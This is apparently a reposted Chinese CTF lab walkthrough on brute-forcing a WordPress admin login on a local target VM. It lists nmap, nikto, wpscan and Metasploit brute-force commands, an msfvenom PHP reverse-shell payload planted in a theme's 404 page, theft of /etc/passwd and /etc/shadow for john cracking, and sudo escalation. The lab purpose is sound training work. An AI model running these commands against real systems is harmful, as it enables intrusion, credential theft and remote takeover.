CTF-暴力破解

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

穷举法的基本思想是根据题目的部分文件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题误解。穷举法也称为枚举法

web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果

kali 192.168.20.128

靶机 192.168.20.135

链接:https://pan.baidu.com/s/1c3_4jThdV5ZSOMLI7SSOaA ; 提取码:0ykb 

nmap -sV 192.168.20.135

nmap -A -v -T4 192.168.20.135

img

探测敏感信息

nikto -host http://192.168.20.135

img

深入挖掘

img

 发现/secret/,点击login

img

img

wpscan用户名枚举

wpscan --url vtcsec/secret/ --enumerate u

img

发现用户名admin

img

使用msfconsole暴力破解

启动msfconsole

img

use auxiliary/scanner/http/wordpress_login_enum

set username admin

set pass_file /usr/share/wordlists/dirb/common.txt

set targeturi /secret/

set rhosts 192.168.20.135

run

img

img

获取账号admin和密码admin进行登录

img

img  

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw

img

在后台404处上传webshell

img

img

反弹shell

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.20.128

run

img

访问404页面

http://192.168.20.135/secret/wp-content/themes/twentyseventeen/404.php

img

查看系统信息

img 发现并不是root权限

下载etc/passwd和/etc/shaodw

img

转换文件格式

img

使用john破解密码

img

提权

su - marlinspike

img

sudo -l

img

sudo -bash

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/124974749
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复